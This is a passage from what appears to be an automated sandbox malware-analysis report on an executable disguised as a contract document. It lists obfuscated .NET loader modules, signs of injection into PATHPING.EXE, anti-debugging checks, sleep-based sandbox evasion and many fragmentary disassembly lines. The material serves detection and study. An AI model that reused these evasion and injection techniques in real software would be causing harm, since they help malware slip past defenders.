                Source: 0.2.draft contract for order #782334.exe.4060b90.1.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.draft contract for order #782334.exe.5bb0000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.cs.Net Code: viO27037Nv System.Reflection.Assembly.Load(byte[])
                Source: 7.2.PATHPING.EXE.3c3cd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: 8.2.RprkEKYwQARXc.exe.2e3cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: 8.0.RprkEKYwQARXc.exe.2e3cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: 9.2.firefox.exe.2f3cd14.0.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0041187B push edx; iretd 2_2_00411881
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00405808 push 147E0EDDh; iretd 2_2_0040580F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004051E4 push esi; ret 2_2_004051E5
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004153EB push ebx; iretd 2_2_0041540B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00415B81 push ebp; ret 2_2_00415BE6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0040B40A pushad ; retf 2_2_0040B40B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004175E8 push ds; iretd 2_2_004175F1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00413E64 push ds; retf 2_2_00413E6E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00415FC0 pushfd ; retf 2_2_00415FC6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00417FFB push cs; retf 2_2_0041801A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D225F pushad ; ret 2_2_016D27F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D27FA pushad ; ret 2_2_016D27F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017009AD push ecx; mov dword ptr [esp], ecx2_2_017009B6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D283D push eax; iretd 2_2_016D2858
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325A373 pushad ; retf 6_2_0325A374
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03264354 push ebx; iretd 6_2_03264374
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03256384 push ds; retf 6_2_0325638C
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03264AEA push ebp; ret 6_2_03264B4F
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325414D push esi; ret 6_2_0325414E
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03264F29 pushfd ; retf 6_2_03264F2F
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03266F64 push cs; retf 6_2_03266F83
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03254771 push 147E0EDDh; iretd 6_2_03254778
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_032607E4 push edx; iretd 6_2_032607EA
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03266549 push ds; iretd 6_2_0326655A
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0361225F pushad ; ret 7_2_036127F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036127FA pushad ; ret 7_2_036127F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036409AD push ecx; mov dword ptr [esp], ecx7_2_036409B6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0361283D push eax; iretd 7_2_03612858
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BA23E5 push 147E0EDDh; iretd 7_2_02BA23EC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BB41C5 push ds; iretd 7_2_02BB41CE
                Source: draft contract for order #782334.exeStatic PE information: section name: .text entropy: 7.963186264062305
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, T7SAIy8s3QaMaAKAVV.csHigh entropy of concatenated method names: 'Dispose', 'xrK3NTocNi', 'XrcJiX0fmj', 'e73EEtaplt', 'c7O34NX9o5', 'rfn3zm4MaZ', 'ProcessDialogKey', 'nO4JYsp4Xk', 'kLrJ3PUMIh', 'iDGJJMWQ4l'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, EpFthq6SeOWTPmwK5vV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGw0AEJKHY', 'eT506nHtio', 'uXc0LV9VnG', 'yWK0wQ6Qfn', 'jrN0MHefGe', 'wDy0C7iPae', 'GUW0FYy7Xv'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, t7aWY2JfX08qdMC8yT.csHigh entropy of concatenated method names: 'KEVmXYgii3', 'I21mQWx2r9', 'ocUmAxgLuA', 'JWmm6AC5B6', 'q9Ymip5W4C', 'pyXmoDMfqt', 'BFfmrP4CJd', 'O4Im9HWq2Z', 'VLWmZVquWW', 'XItmjgeTeC'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, K8N0rdryY0VjexmvBh.csHigh entropy of concatenated method names: 'eKfSxjxkSH', 't6hSVOvIOu', 'OxtSWuntQm', 'nimSvDcwmn', 'kjdStTVmKh', 'kb3Sa3bYDA', 'jvMSf5Vu4B', 'tu7ScQ340s', 'WlaSBEer90', 'roQSUG5HTQ'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, eegnrfovenGAtahD1x.csHigh entropy of concatenated method names: 'OFk5O0MGcq', 'vad540k7yl', 'vDVSY9s7HF', 'cf7S3ISJsc', 'RiN5DKlZsV', 'kPm5Qhojpy', 'wEi5hhRfej', 'MYF5AcAXfZ', 'sug56eAqkD', 'LKX5LKiaIj'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, SbxMawGDFc1cYCqZlF.csHigh entropy of concatenated method names: 'EhZSguUsIH', 'W0lSiq0PRV', 'EqWSoiAdk9', 'q0jSritQXs', 'v6mSAI495y', 'EvoS9eJAxj', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.csHigh entropy of concatenated method names: 'sgGdl8O9kU', 'CJ2dxQYpBY', 'Hl3dVKuj3r', 'pQKdWZbhoh', 'u9edvAvg3M', 'VFydtH1E8V', 'usXda77ayE', 'dxldfd2LVV', 'anOdcYxYKP', 'r1SdBaYGh8'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, dOnqtYxW6fCr5C4gUB.csHigh entropy of concatenated method names: 'U3TKkLgrVW', 'BTDKR5h1A2', 'cXDKgJjygf', 'cIhKiu7V1a', 'XODKr4fcMQ', 'kXjK9YPXk1', 'e4ZKjLIhiT', 'WVGKuk3Fws', 'cZWKXf3bsd', 'nuLKDpcSyD'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, uAPtON66OIsqQN9BPw5.csHigh entropy of concatenated method names: 'ToString', 'c440d1xdYX', 'jhF02twn86', 'WGm0lu3HH7', 'TLP0x91Dmp', 'YxE0V16CPS', 'UcI0W3FHSy', 'Mos0vV5hEB', 'jSIMnXGFLqOKjlHV8mW', 'igfZERGcFUbi4KBNHYj'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, eku3ZZQJyWRgCApSxB.csHigh entropy of concatenated method names: 'J063am5ZX0', 'ewl3fS2Aj4', 'spr3B1MQmN', 'W673UlPoBB', 'xVo3mHA3Ww', 'rFE3sxJGQQ', 'W1IXvRljgfOqo2K3yp', 'jtGJ6swDYso4GQCoiv', 'YOr33jTc9v', 'aoe3dMkkab'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, lGFC0HIiY7o3iUEU6U.csHigh entropy of concatenated method names: 'ToString', 'YsQsDvWdtH', 'rROsiQtjkv', 'cvPsouMdga', 'iR4srtbQU2', 'Q61s98Tpbf', 'MnZsZQL8Bp', 'H6OsjJSIf3', 'mqMsungxwt', 'KjLsGeUCnX'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, t2pR6skCicQqKjshfc.csHigh entropy of concatenated method names: 'KMkvPmFXiH', 'vmlvnWWnDf', 'tj5WoNDxd7', 'wPcWre7LPh', 'GM3W93EvIL', 'sZ9WZL1s1X', 'odaWjhOFt8', 'dV4WuGFbl3', 'lvmWGTD3Nd', 'cYkWXRY8eQ'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, brGu3hc2hcqi3Ph5uR.csHigh entropy of concatenated method names: 'xja4Oxn2tDAi3TwbaLw', 'Uu1MTHnm9ZyBt0xqqr8', 'TlitSIp6MV', 'aYttp67fce', 'obBt0P8gW0', 'df7IN2nK7F08Xx4yl5T', 'YNYQdLnfEyrSw1fZvfw'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, Daa9x6p8K4JlMbJdQy.csHigh entropy of concatenated method names: 'zMK7NNJhG', 'FaKIdXcVr', 'ONf1af93v', 'Rcjn9y8i0', 'LfVRtj2h7', 'uuyTtqkoV', 'yMOmhj9V3RvkrIEZFh', 'bkH9SFUGO8Av7xIcZI', 'GsFSCKwrC', 'v5l0Q37ub'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BZkO9lBsWxu4CvMeio.csHigh entropy of concatenated method names: 'txgtlqkyOs', 'CKjtVfV1ti', 'jBYtv2tTxc', 'FvFtaQnOYT', 'xLatfUOS4Z', 'EO3vM4Q77U', 'UCwvCtGd0C', 'u9mvFBRUjX', 'lUovOEpSpO', 'MP4vNiGG2R'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, FClwO49SKVoyopkRBu.csHigh entropy of concatenated method names: 'CQ4ayPNaAd', 'mK4abtA49k', 'l7Ra7Pa1QB', 'jMGaIg5brW', 'NmwaPZKhUR', 'jKea1oSRAN', 'TadanqYJuV', 'jnVakPYLID', 'IgGaRMStto', 'WkiaTrC91L'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, Xr6bVuWI8Xsm8tjknr.csHigh entropy of concatenated method names: 'TsFp3rI3Jx', 'fGfpdSwFud', 'pwPp2WnuTa', 'TOepxpetsm', 'MoypVpMRm6', 'tfPpvuhvOn', 'gyAptaphPb', 'gptSFnUXEI', 'r46SOlH4lV', 'ANQSN8xgQk'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, HVj9taPB6orrMyXKMK.csHigh entropy of concatenated method names: 'R00VAUXSTa', 'DGgV608fWW', 'fkPVLZnEtS', 'luDVwX72Ph', 'um6VMKMB2S', 'O9gVC4yrtv', 'UWGVFeIUib', 'WDPVOXSMp0', 'QXSVNyccTq', 'j0IV4fqEr9'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, aRsIYS6aC76so6fOE9u.csHigh entropy of concatenated method names: 'UutpynFH5f', 'VrKpbtmqpF', 'VEXp7Bq6Ub', 'fvqpIskQxb', 'iZLpPuP29S', 'vL0p1mGbuC', 'n0GpnHtcQr', 'iuepkLr4uN', 'QR9pRagyRJ', 'eDppTMhHgy'
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: draft contract for order #782334.exe PID: 6212, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: 1720000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: 3040000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: 5040000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: 8FD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: 9FD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: A1D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: B1D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: BC30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: CC30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Memory allocated: DC30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Code function: 2_2_0174096E rdtsc 2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Window / User API: threadDelayed 1681
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Window / User API: threadDelayed 8292
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\PATHPING.EXE, API coverage: 2.6 %
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe TID: 6192, Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852, Thread sleep count: 1681 > 30
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852, Thread sleep time: -3362000s >= -30000s
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852, Thread sleep count: 8292 > 30
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852, Thread sleep time: -16584000s >= -30000s
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228, Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228, Thread sleep count: 35 > 30
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228, Thread sleep time: -52500s >= -30000s
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228, Thread sleep count: 38 > 30
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228, Thread sleep time: -38000s >= -30000s
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Last function: Thread delayed
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Code function: 7_2_02BBC160 FindFirstFileW,FindNextFileW,FindClose,7_2_02BBC160
                Source: RprkEKYwQARXc.exe, 00000008.00000002.4135270406.000000000104F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                Source: firefox.exe, 00000009.00000002.2387837212.0000013842F3C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: PATHPING.EXE, 00000007.00000002.4134882508.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Process queried: DebugPort
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Process queried: DebugPort
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Code function: 2_2_00417513 LdrLoadDll,2_2_00417513
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A8350 mov ecx, dword ptr fs:[00000030h]2_2_017A8350
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CA352 mov eax, dword ptr fs:[00000030h]2_2_017CA352
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D634F mov eax, dword ptr fs:[00000030h]2_2_017D634F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov ecx, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720310 mov ecx, dword ptr fs:[00000030h]2_2_01720310
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]2_2_0173A30B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]2_2_0173A30B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]2_2_0173A30B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FC310 mov ecx, dword ptr fs:[00000030h]2_2_016FC310
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]2_2_0171E3F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]2_2_0171E3F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]2_2_0171E3F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017363FF mov eax, dword ptr fs:[00000030h]2_2_017363FF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov ecx, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A43D4 mov eax, dword ptr fs:[00000030h]2_2_017A43D4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A43D4 mov eax, dword ptr fs:[00000030h]2_2_017A43D4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BC3CD mov eax, dword ptr fs:[00000030h]2_2_017BC3CD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017863C0 mov eax, dword ptr fs:[00000030h]2_2_017863C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]2_2_016FE388
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]2_2_016FE388
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]2_2_016FE388
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]2_2_016F8397
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]2_2_016F8397
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]2_2_016F8397
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172438F mov eax, dword ptr fs:[00000030h]2_2_0172438F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172438F mov eax, dword ptr fs:[00000030h]2_2_0172438F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F826B mov eax, dword ptr fs:[00000030h]2_2_016F826B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
